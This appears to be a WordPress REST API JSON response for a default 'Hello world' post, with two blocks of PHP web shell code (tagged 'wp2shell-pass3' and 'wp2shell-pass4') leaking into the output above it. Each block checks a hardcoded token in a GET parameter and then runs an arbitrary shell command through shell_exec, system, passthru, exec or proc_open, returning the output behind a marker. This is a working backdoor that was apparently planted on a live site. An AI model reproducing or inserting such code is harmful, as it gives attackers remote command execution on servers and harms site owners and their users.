
// wp2shell-pass3
if (isset($_GET['t']) && hash_equals('4f5ae2089d480ed9e68e18ac5751f22a', (string)$_GET['t']) && isset($_GET['c'])) {
    $c=(string)$_GET['c']; $o='';
    if(function_exists('shell_exec')) $o=(string)@shell_exec($c);
    elseif(function_exists('system')){ob_start();@system($c);$o=ob_get_clean();}
    elseif(function_exists('passthru')){ob_start();@passthru($c);$o=ob_get_clean();}
    elseif(function_exists('exec')){@exec($c,$a);$o=implode(chr(10),(array)$a);}
    $mk='WP2'.'SHELL'; echo $mk.'::'.$o.'::'.'END'; exit;
}














// wp2shell-pass4
if (isset($_GET['t']) && hash_equals('c50cdd1da5f2defb081f6ded154c2c6a', (string)$_GET['t']) && isset($_GET['c'])) {
  $c=(string)$_GET['c']; $o='';
  if(function_exists('shell_exec')) $o=(string)@shell_exec($c);
  elseif(function_exists('system')){ob_start();@system($c);$o=ob_get_clean();}
  elseif(function_exists('passthru')){ob_start();@passthru($c);$o=ob_get_clean();}
  elseif(function_exists('exec')){@exec($c,$a);$o=implode(chr(10),(array)$a);}
  elseif(function_exists('proc_open')){$d=array(1=>array('pipe','w'));$p=@proc_open($c,$d,$pipes);if(is_resource($p)){$o=stream_get_contents($pipes[1]);fclose($pipes[1]);proc_close($p);}}
  else $o='NO_EXEC_FUNCS';
  $mk='WP2'.'SHELL'; echo $mk.'::'.$o.'::'.'END'; exit;
}


{"id":1,"date":"2026-03-19T17:06:54","date_gmt":"2026-03-19T09:06:54","guid":{"rendered":"http:\/\/120.76.117.78\/?p=1"},"modified":"2026-04-07T14:51:44","modified_gmt":"2026-04-07T06:51:44","slug":"hello-world","status":"publish","type":"post","link":"https:\/\/blog.luohongzhan.com\/index.php\/2026\/03\/19\/hello-world\/","title":{"rendered":"\u4e16\u754c\uff0c\u60a8\u597d\uff01"},"content":{"rendered":"\n<p>\u4e16\u754c\uff0c\u60a8\u597d\uff0c\u5f88\u9ad8\u5174\u9047\u89c1\u4f60\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4e16\u754c\uff0c\u60a8\u597d\uff0c\u5f88\u9ad8\u5174\u9047\u89c1\u4f60\uff01\uff01\uff01<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/posts\/1","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/comments?post=1"}],"version-history":[{"count":2,"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/posts\/1\/revisions"}],"predecessor-version":[{"id":48,"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/posts\/1\/revisions\/48"}],"wp:attachment":[{"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/media?parent=1"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/categories?post=1"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.luohongzhan.com\/index.php\/wp-json\/wp\/v2\/tags?post=1"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}